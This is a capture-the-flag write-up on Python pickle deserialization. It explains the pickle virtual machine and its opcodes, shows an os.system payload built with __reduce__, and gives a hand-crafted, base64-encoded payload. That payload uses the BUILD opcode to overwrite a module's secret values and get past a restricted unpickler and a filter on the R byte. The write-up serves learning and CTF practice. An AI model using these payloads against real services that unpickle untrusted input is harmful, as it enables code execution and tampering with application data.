Pickle Deserialization: University Anti-"Epidemic" Cybersecurity Sharing Competition
What is Pickle?
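Introduction
A few days ago I read P牛's article on pickle deserialization, and the competition happened to include a challenge on it, which gave me a chance to deepen my understanding through practice. First, though, I need to know what pickle deserialization actually is.
pickle is a stack-based language that runs on a lightweight PVM (Pickle Virtual Machine). The PVM consists mainly of an instruction processor, a stack, and a memo.
- Instruction processor: reads opcodes and their arguments and interprets them. The value left on top of the stack at the end is returned as the deserialized object.
- stack: temporary storage for data, arguments, and objects. It is implemented as a Python list and can be thought of as the computer's memory.
- memo: storage that lasts for the whole lifetime of the PVM. It is implemented as a Python dict and can be thought of as the computer's disk.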
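To make the roles of the stack and the memo concrete, here is a minimal sketch using only the standard pickle module. Both byte strings are hand-written illustrations and are not part of the challenge.

```python
import pickle

# Two integers are pushed; STOP ('.') returns whatever is on top of the stack.
top_of_stack = pickle.loads(b"I1\nI2\n.")

# Push 'a', store it in memo slot 0 (p0), discard it from the stack (0),
# then fetch it back from the memo (g0) before STOP.
from_memo = pickle.loads(b"S'a'\np0\n0g0\n.")

print(top_of_stack, from_memo)
```

The second pickle only works because the memo outlives the POP: the stack is empty by the time GET runs.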
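Instruction set
At the time of writing there are five pickle protocols, v0 through v4 (Python 3.8 has since added protocol 5). The higher the protocol version, the newer the Python version needed to read the resulting pickle.
- Protocol v0 is the original "human-readable" protocol and is backwards compatible with earlier versions of Python.
- Protocol v1 is an old binary format that is also compatible with earlier versions of Python.
- Protocol v2 was introduced in Python 2.3. It provides a much more efficient way to pickle new-style classes. See PEP 307 for the improvements brought by protocol 2.
- Protocol v3 was added in Python 3.0. It has explicit support for bytes objects and cannot be unpickled by Python 2.x. It was the default protocol in Python 3.0 through 3.7 and is the recommended one when compatibility with other Python 3 versions is required.
- Protocol v4 was added in Python 3.4. It supports very large objects, can pickle more kinds of objects, and includes some data format optimizations. See PEP 3154 for the improvements brought by protocol 4.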
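The difference between protocols is easy to observe directly. The sketch below pickles one sample value (an arbitrary dict chosen for illustration) under every protocol the running interpreter supports and checks for the PROTO header that protocol 2 and later emit.

```python
import pickle

value = {"name": "giaogiao", "ids": [1, 2, 3]}

# Serialize the same object under every protocol this interpreter supports.
dumps_by_protocol = {
    proto: pickle.dumps(value, protocol=proto)
    for proto in range(pickle.HIGHEST_PROTOCOL + 1)
}

for proto, data in dumps_by_protocol.items():
    # Protocol 2 and later start with the PROTO opcode (0x80) plus a version byte.
    has_header = data[:1] == b"\x80"
    print(proto, len(data), has_header)
```

Every variant loads back to the same dict; only the encoding differs.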
All opcodes can be looked up in the pickle source code. They are reproduced below (the list is long, so feel free to skip it).
# Pickle opcodes. See pickletools.py for extensive docs. The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
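Rather than scanning the listing by eye, the same information can be queried from the standard pickletools module. This is a small sketch; the four opcodes looked up here are simply the ones that matter later in this write-up.

```python
import pickletools

# Map each one-character opcode to its pickletools description.
by_code = {op.code: op for op in pickletools.opcodes}

for code in ("c", "R", "b", "\x81"):
    op = by_code[code]
    print(repr(code), op.name, "protocol", op.proto)
```

Note that pickletools reports BUILD as a protocol 0 opcode, so it is available no matter which protocol the rest of a payload uses.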
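Pickle serialization
Pickle payloads are mainly produced in two ways: through the __reduce__ magic method, or by writing the opcodes by hand.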
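- The __reduce__ method
import os
import pickle

class exp(object):
    def __reduce__(self):
        s = r"""touch /tmp/success"""
        return (os.system, (s,))

print(pickle.dumps(exp(), protocol=0))
# Output on Windows, where os.system lives in the nt module (posix on Linux):
# b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'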
- Hand-written opcodes, which can be debugged and analyzed with pickletools
$ python -m pickletools pickle.txt
    0: c    GLOBAL     'nt system'           # push the callable nt.system (posix.system on Linux) onto the stack
   11: p    PUT        0                     # store that object in memo slot 0
   14: (    MARK                             # push the marker that starts a tuple
   15: V    UNICODE    'touch /tmp/success'  # push a string
   35: p    PUT        1                     # store the string in memo slot 1
   38: t    TUPLE      (MARK at 14)          # pop everything back to the marker and push it as one tuple
   39: p    PUT        2                     # store the tuple in memo slot 2
   42: R    REDUCE                           # pop the callable and the tuple, call it, push the result
   43: p    PUT        3                     # store the top of the stack (the call result) in memo slot 3
   46: .    STOP                             # end
highest protocol among opcodes = 0           # protocol v0
>>> b'''cnt
system
p0
(Vtouch /tmp/success
p1
tp2
Rp3
.'''
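The __reduce__ route can be tried safely by swapping os.system for a harmless callable. The sketch below uses operator.add as a stand-in (my substitution, not part of the original payload) to show that unpickling calls the function and returns its result.

```python
import operator
import pickle

class Demo:
    def __reduce__(self):
        # (callable, args): the unpickler will call operator.add(1, 2).
        return (operator.add, (1, 2))

data = pickle.dumps(Demo(), protocol=0)
result = pickle.loads(data)  # no Demo instance comes back, only the call result

print(data, result)
```

The serialized bytes contain the REDUCE opcode R, which is exactly what the challenge below filters on.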
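Note the conventions for writing PVM instructions by hand:
(1) Every opcode is a single byte.
(2) In protocol 0, the argument of an opcode that takes one is terminated by a newline.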
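These two rules are enough to write a small pickle by hand. The following sketch builds a harmless tuple from protocol 0 opcodes and uses pickletools.genops to confirm how the bytes are parsed; the payload is an illustration of mine, not taken from the challenge.

```python
import pickle
import pickletools

# Hand-written protocol 0 pickle: MARK, two strings, TUPLE, STOP.
handwritten = b"(S'a'\nS'b'\nt."

# genops yields (opcode info, argument, byte offset) for each instruction.
names = [op.name for op, arg, pos in pickletools.genops(handwritten)]
value = pickle.loads(handwritten)

print(names, value)
```

MARK, TUPLE, and STOP take no argument and therefore need no newline, while each STRING argument ends with one.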
Challenge analysis
The challenge is named webtmp. Its source code is shown below.
import base64
import io
import sys
import pickle

from flask import Flask, Response, render_template, request
import secret

app = Flask(__name__)


class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


def read(filename, encoding='utf-8'):
    with open(filename, 'r', encoding=encoding) as fin:
        return fin.read()


@app.route('/', methods=['GET', 'POST'])
def index():
    if request.args.get('source'):
        return Response(read(__file__), mimetype='text/plain')
    if request.method == 'POST':
        try:
            pickle_data = request.form.get('data')
            if b'R' in base64.b64decode(pickle_data):
                return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
            else:
                result = restricted_loads(base64.b64decode(pickle_data))
                if type(result) is not Animal:
                    return 'Are you sure that is an animal???'
            correct = (result == Animal(secret.name, secret.category))
            return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
        except Exception as e:
            print(repr(e))
            return "Something wrong"
    sample_obj = Animal('giaogiao', 'Giao')
    pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
    return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
Two key points are easy to spot:
- The input is unpickled, but find_class only allows globals that live in sys.modules['__main__'].
- When correct is True, the flag is returned.
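The effect of the find_class restriction can be reproduced outside Flask. This sketch copies RestrictedUnpickler from the challenge source; try_load is a hypothetical helper added here only to capture the error message.

```python
import io
import pickle
import sys

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Same rule as the challenge: only names living in __main__ are allowed.
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def try_load(data):
    """Return the unpickled value, or the error text if loading is refused."""
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "blocked: %s" % exc

# GLOBAL 'os system' followed by STOP: it never gets past find_class.
blocked = try_load(b"cos\nsystem\n.")
print(blocked)
```

So even before the R filter is considered, a GLOBAL opcode can only ever hand back something that is already an attribute of __main__.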
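Judging by these checks, we need to deserialize an Animal object whose attributes equal the name and category in secret. That passes the comparison and yields the flag.
The challenge does not provide secret.py, but it is not hard to guess roughly what it looks like: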
# secret.py
name="xxx"
category="?????"
# test (run inside the challenge's main module, which imports sys and secret)
a = sys.modules['__main__'].secret.name
print(a) # xxx
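From here there are two possible approaches:
- Read the name and category values from secret, then use them to create an Animal object.
- Overwrite name and category, then create an Animal object from the values we wrote.
For the first approach, after many attempts I could not find a way to reach __main__.secret.name. One obstacle is that find_class performs a single getattr on __main__, so a dotted name such as secret.name is not resolved.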
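The dotted-name obstacle can be shown in isolation. In this sketch fake_main is a hypothetical stand-in for the server's __main__ module, and lookup mimics the single getattr that find_class performs.

```python
import types

# Hypothetical stand-in for the challenge's __main__ module and its secret import.
fake_main = types.ModuleType("fake_main")
fake_main.secret = types.ModuleType("secret")
fake_main.secret.name = "xxx"

def lookup(name):
    """Mimic the single getattr performed by the challenge's find_class."""
    try:
        return getattr(fake_main, name)
    except AttributeError:
        return None

reachable = lookup("secret")       # the module object itself is reachable
dotted = lookup("secret.name")     # a dotted path is not resolved by getattr
print(reachable, dotted)
```

A GLOBAL opcode can therefore put the secret module on the stack, but not the string stored inside it.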
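That leaves the second approach. While reading through the documentation for the various pickle protocols, I found in the protocol 2 documentation
that deserialization can change an object's attribute values. The corresponding opcode is: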
BUILD = b'b' # call __setstate__ or __dict__.update()
Now the plan is clear: first overwrite the attribute values, then create the Animal object. The next step is to write the pickle opcodes by hand.
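Before building the real payload, the overwrite step can be checked on its own. This is a minimal sketch under stated assumptions: fake_main stands in for the server's __main__, DemoUnpickler is a hypothetical copy of the challenge's lookup rule pointed at that stand-in, and the value 'patched' is arbitrary.

```python
import io
import pickle
import types

# Hypothetical stand-in for the server's __main__ and its imported secret module.
fake_main = types.ModuleType("fake_main")
fake_main.secret = types.ModuleType("secret")
fake_main.secret.name = "original"

class DemoUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve '__main__' against the stand-in module instead of the real one.
        if module == "__main__":
            return getattr(fake_main, name)
        raise pickle.UnpicklingError("forbidden")

# GLOBAL __main__.secret, EMPTY_DICT, 'name', 'patched', SETITEM, BUILD, STOP
payload = b"c__main__\nsecret\n}S'name'\nS'patched'\nsb."
returned = DemoUnpickler(io.BytesIO(payload)).load()

print(fake_main.secret.name)
```

A module has no __setstate__, so BUILD falls back to updating its __dict__, which rebinds secret.name in place without ever using the R opcode.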
Building the payload
# Part 1 of the payload: pass in a dict that overwrites the attribute values
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''
# Part 2 of the payload: construct the object
exp = Animal("xxxxx","yyyyy")
payload_2 = pickle.dumps(exp)
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
# Combine the payloads
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==
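The whole chain can be rehearsed locally without Flask. The sketch below replays the server-side checks against a stand-in module: fake_main, the placeholder secret values, and the check helper are all hypothetical, and the Animal half of the payload is the same opcode sequence as above with the memo writes (q) left out.

```python
import base64
import io
import pickle
import types

class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category

# Hypothetical stand-in for the server's __main__; the secret values are placeholders.
fake_main = types.ModuleType("fake_main")
fake_main.Animal = Animal
fake_main.secret = types.ModuleType("secret")
fake_main.secret.name = "unknown-name"
fake_main.secret.category = "unknown-category"

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "__main__":
            return getattr(fake_main, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def check(b64_data):
    """Replay the server-side checks; True means the flag would be given."""
    raw = base64.b64decode(b64_data)
    if b"R" in raw:
        return False
    result = RestrictedUnpickler(io.BytesIO(raw)).load()
    if type(result) is not Animal:
        return False
    return result == Animal(fake_main.secret.name, fake_main.secret.category)

# Part 1: overwrite secret.name and secret.category via BUILD (no STOP yet).
overwrite = b"c__main__\nsecret\n}S'name'\nS'xxxxx'\nsS'category'\nS'yyyyy'\nsb"
# Part 2: NEWOBJ creates an Animal, BUILD fills in its attributes, STOP returns it.
build_animal = (b"c__main__\nAnimal\n)\x81}(X\x04\x00\x00\x00nameX\x05\x00\x00\x00xxxxx"
                b"X\x08\x00\x00\x00categoryX\x05\x00\x00\x00yyyyyub.")

giveflag = check(base64.b64encode(overwrite + build_animal))
print(giveflag)
```

The patched secret module stays on the stack underneath the Animal, which is harmless because only the top of the stack is returned.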
Getting the flag